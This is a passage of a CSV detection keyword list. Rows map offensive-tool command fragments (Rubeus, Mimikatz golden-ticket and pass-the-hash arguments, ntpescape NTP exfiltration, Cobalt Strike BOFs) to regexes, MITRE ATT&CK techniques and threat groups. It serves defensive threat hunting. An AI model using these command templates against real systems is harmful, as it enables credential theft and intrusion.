TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","155","38","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "* /nofullpacsig *",".{0,1000}\s\/nofullpacsig\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* /outfile:* /spn:*",".{0,1000}\s\/outfile\:.{0,1000}\s\/spn\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* /outfile:* /spns:*",".{0,1000}\s\/outfile\:.{0,1000}\s\/spns\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* /PID:* /DRIVER:*",".{0,1000}\s\/PID\:.{0,1000}\s\/DRIVER\:.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","155","38","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "* /PID:* /KILL*",".{0,1000}\s\/PID\:.{0,1000}\s\/KILL.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - 
T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","155","38","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" "* /potato.local*",".{0,1000}\s\/potato\.local.{0,1000}","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. 
This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","0","N/A","10","7","656","95","2023-11-07T01:09:08Z","2023-01-04T18:22:29Z" "* /ptt /binary:*.kirbi*",".{0,1000}\s\/ptt\s\/binary\:.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "* /pwdsetafter:*",".{0,1000}\s\/pwdsetafter\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* /pwdsetbefore:*",".{0,1000}\s\/pwdsetbefore\:.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* /rc4opsec *",".{0,1000}\s\/rc4opsec\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* /s4uproxytarget*",".{0,1000}\s\/s4uproxytarget.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* /s4utransitedservices*",".{0,1000}\s\/s4utransitedservices.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. 
It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* /service:krbtgt *",".{0,1000}\s\/service\:krbtgt\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* /setntlm * /user:* /newhash:*",".{0,1000}\s\/setntlm\s.{0,1000}\s\/user\:.{0,1000}\s\/newhash\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "* /setntlm * /user:* /newpwd:*",".{0,1000}\s\/setntlm\s.{0,1000}\s\/user\:.{0,1000}\s\/newpwd\:.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 
- T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","10","1","32","8","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z" "* /simple * /spn*",".{0,1000}\s\/simple\s.{0,1000}\s\/spn.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* /taskname:Cleanup *",".{0,1000}\s\/taskname\:Cleanup\s.{0,1000}","offensive_tool_keyword","ScheduleRunner","A C# tool with more flexibility to customize scheduled task for both persistence and Lateral Movement in red team operation","T1210 T1570 T1021 T1550","TA0008","N/A","N/A","Persistence","https://github.com/netero1010/ScheduleRunner","1","0","N/A","9","4","311","41","2022-07-05T10:24:45Z","2021-10-12T15:27:32Z" "* /ticket *.kirbi*",".{0,1000}\s\/ticket\s.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* /ticket:* /autoenterprise *",".{0,1000}\s\/ticket\:.{0,1000}\s\/autoenterprise\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* /ticket:* /service:* /targetdomain:* /targetdc:*",".{0,1000}\s\/ticket\:.{0,1000}\s\/service\:.{0,1000}\s\/targetdomain\:.{0,1000}\s\/targetdc\:.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 
- T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "* /ticket:*.kirbi*",".{0,1000}\s\/ticket\:.{0,1000}\.kirbi.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* /user:* /domain:* /aes256:* /run:powershell.exe*",".{0,1000}\s\/user\:.{0,1000}\s\/domain\:.{0,1000}\s\/aes256\:.{0,1000}\s\/run\:powershell\.exe.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement with Mimikatz Overpass-the-hash a more opsec-safe version that uses the AES256 key (similar to with Rubeus above) - works for multiple Mimikatz commands","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* /user:* /domain:* /ntlm:* /run:powershell.exe*",".{0,1000}\s\/user\:.{0,1000}\s\/domain\:.{0,1000}\s\/ntlm\:.{0,1000}\s\/run\:powershell\.exe.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Lateral 
Movement with Mimikatz Overpass-the-hash (more risky than Rubeus writes to LSASS memory)","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* /user:* /domain:* /sid:S-1-5-21-* /krbtgt:* /id:* /groups:* /startoffset:0 /endin:600 /renewmax:10080 /ptt*",".{0,1000}\s\/user\:.{0,1000}\s\/domain\:.{0,1000}\s\/sid\:S\-1\-5\-21\-.{0,1000}\s\/krbtgt\:.{0,1000}\s\/id\:.{0,1000}\s\/groups\:.{0,1000}\s\/startoffset\:0\s\/endin\:600\s\/renewmax\:10080\s\/ptt.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Lateral Movement with Mimikatz Golden ticket (domain admin w/ some ticket properties to avoid detection)","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* /user:* /password:* /enctype:* /opsec /ptt*",".{0,1000}\s\/user\:.{0,1000}\s\/password\:.{0,1000}\s\/enctype\:.{0,1000}\s\/opsec\s\/ptt.{0,1000}","offensive_tool_keyword","cobaltstrike","BOF for Kerberos abuse (an implementation of some important features of the Rubeus)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - 
TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RalfHacker/Kerbeus-BOF","1","0","N/A","10","10","321","32","2023-11-20T17:30:34Z","2023-11-20T10:01:36Z" "* /usetgtdeleg *",".{0,1000}\s\/usetgtdeleg\s.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","10","10","3823","749","2024-04-26T11:33:01Z","2018-09-23T23:59:03Z" "* :Failed to make full encrypt*",".{0,1000}\s\:Failed\sto\smake\sfull\sencrypt.{0,1000}","offensive_tool_keyword","Akira","Akira ransomware Windows payload","T1486 - T1490","TA0040","N/A","N/A","Ransomware","https://github.com/rivitna/Malware","1","0","#yara","10","3","261","38","2024-05-01T19:21:20Z","2021-07-28T21:00:52Z" "* [+] SUCCESS: AMSI Bypassed!*",".{0,1000}\s\[\+\]\sSUCCESS\:\sAMSI\sBypassed!.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "* \Temp\blah.exe*",".{0,1000}\s\\Temp\\blah\.exe.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","PowerUp.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*- {phish_sub: *",".{0,1000}\-\s\{phish_sub\:\s.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/Evilginx2-Phishlets","1","0","N/A","10","5","449","214","2023-12-12T08:00:52Z","2020-05-13T05:58:43Z" "* | ./send -d *:123 -tM 0 -tm 
0*",".{0,1000}\s\|\s\.\/send\s\-d\s.{0,1000}\:123\s\-tM\s0\s\-tm\s0.{0,1000}","offensive_tool_keyword","ntpescape","ntpescape is a tool that can stealthily (but slowly) exfiltrate data from a computer using the Network Time Protocol (NTP).","T1048 - T1071.004","TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/evallen/ntpescape","1","0","N/A","10","2","130","16","2023-11-14T18:54:14Z","2022-09-22T16:25:15Z" "* | Find-AmsiSignatures*",".{0,1000}\s\|\sFind\-AmsiSignatures.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","71","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "* | NTLMParse*",".{0,1000}\s\|\sNTLMParse.{0,1000}","offensive_tool_keyword","ADFSRelay","NTLMParse is a utility for decoding base64-encoded NTLM messages and printing information about the underlying properties and fields within the message. Examining these NTLM messages is helpful when researching the behavior of a particular NTLM implementation. ADFSRelay is a proof of concept utility developed while researching the feasibility of NTLM relaying attacks targeting the ADFS service. 
This utility can be leveraged to perform NTLM relaying attacks targeting ADFS","T1140 - T1212 - T1557","TA0007 - TA0008 - TA0006","N/A","N/A","Credential Access","https://github.com/praetorian-inc/ADFSRelay","1","0","N/A","10","2","169","13","2022-06-22T03:01:00Z","2022-05-12T01:20:14Z" "* | Test-ContainsAmsiSignatures*",".{0,1000}\s\|\sTest\-ContainsAmsiSignatures.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","N/A","7","4","382","71","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z" "* \n\n*",".{0,1000}\s\\\n\\n.{0,1000}","offensive_tool_keyword","DarkWidow","Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing","T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140","TA0005 - TA0003 - TA0002 - TA0004","N/A","N/A","Defense Evasion","https://github.com/reveng007/DarkWidow","1","0","N/A","10","5","452","69","2024-04-19T20:15:04Z","2023-07-24T13:59:16Z" "* = ""KRBRELAYUP""*",".{0,1000}\s\=\s\""KRBRELAYUP\"".{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "* = [H,O,A,X,S,H,E,L,L]*",".{0,1000}\s\=\s\[H,O,A,X,S,H,E,L,L\].{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. 
currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","N/A","N/A","10","2888","463","2024-03-29T12:50:55Z","2022-07-10T15:36:24Z" "* > \\127.0.0.1\ADMIN$\__* 2>&1",".{0,1000}\s\>\s\\\\127\.0\.0\.1\\ADMIN\$\\__.{0,1000}\s2\>\&1","offensive_tool_keyword","malware","Destructive Malware targeting organizations","T1486 T1059","TA0008","N/A","N/A","Ransomware","https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* > Wi-Fi-PASS*",".{0,1000}\s\>\sWi\-Fi\-PASS.{0,1000}","offensive_tool_keyword","wifigrabber","grab wifi password and exfiltrate to a given site","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/wifigrabber","1","0","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "* 0.0.0.0:8080 --threads*",".{0,1000}\s0\.0\.0\.0\:8080\s\-\-threads.{0,1000}","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1502","474","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" "* 1$a$$.exe*",".{0,1000}\s1\$a\$\$\.exe.{0,1000}","offensive_tool_keyword","DumpThatLSASS","Dumping LSASS by Unhooking MiniDumpWriteDump by getting a fresh DbgHelp.dll copy from the disk","T1003 - T1055.011 - T1027 - T1564.001","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/peiga/DumpThatLSASS","1","0","N/A","10","1","29","81","2022-09-24T22:39:04Z","2022-09-24T22:41:19Z" "* 1.2.3.4:8080*",".{0,1000}\s1\.2\.3\.4\:8080.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends 
off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic 